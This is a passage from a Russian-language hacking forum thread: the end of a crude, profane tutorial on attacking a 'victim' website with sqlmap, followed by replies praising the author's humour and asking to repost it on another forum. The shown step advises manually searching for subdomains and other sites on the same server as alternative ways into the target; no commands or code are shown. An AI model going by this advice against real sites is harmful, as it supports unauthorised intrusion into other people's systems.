4. Никуя не получается. Изучаем сайт в ручную и ищем то, что не смог показать гугл. Ищем поддомены, другие сайты на сервере, короче ищем другие входы на жертву

У скулмапа есть много других параметров, но тебе придется самому их изучить, потому что если я буду разжовывать каждый параметр, это означает, что ты дебил только и можешь как робот по инструкциям дро_чить, но хакер, это тот кто умеет гибко думать и находить дыры там, где их никто не замечает

До следующих встреч...
 
Мне конечно ничего не понятно в этой сфере, но автор пишет прикольно, прочел с улыбкой!
 
ТС, хочу попросить продублировать информационные посты на форуме moneymaker.bz - вам там будут рады)

Если лень, могу скопипастить туда сам, с вашего позволения.

Ну и продолжения ждем)
 
Последнее редактирование:
Че глаза вытаращил? Щас б_ля лопнут

И дупло закрой
===============================

Пля, пи_здец у тебя точно щас глаза лопнут

===============================

:D:D:D Продолжай в том же духе!
Прикольно читается с улыбкой) Хоть и знаю все это, но таких моментах я просто под столом от смеха был)))
Респект
 
Назад
Сверху